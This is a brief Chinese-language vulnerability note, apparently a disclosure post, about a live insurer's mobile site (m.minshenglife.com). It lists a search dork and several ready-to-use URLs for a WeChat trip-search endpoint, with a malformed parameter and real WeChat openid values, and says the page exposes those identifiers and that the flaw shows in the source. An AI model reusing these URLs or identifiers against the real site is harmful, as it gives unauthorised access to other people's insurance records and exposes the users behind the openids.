利用方式:site:m.minshenglife.com/
http://m.minshenglife.com/wm/wx/wxTripSearchBothContDetail.do?aaa=%22+111&openid=opqgIuM_2nsC5UzmKxI5iF8eJpGI
这里直接带出了opqgIuM_2nsC5UzmKxI5iF8eJpGI

漏洞在源代码中
我们来看看


http://m.minshenglife.com/wm/wx/wxTripSearchBothContDetail.do?aaa=%22+111&openid=opqgIuHyhwZOxLWrQCsUgG0sJKuc
http://m.minshenglife.com/wm/wx/wxTripSearchBothContDetail.do?aaa=%22+111&openid=opqgIuEcCgDlDvshXXoS20BR3ric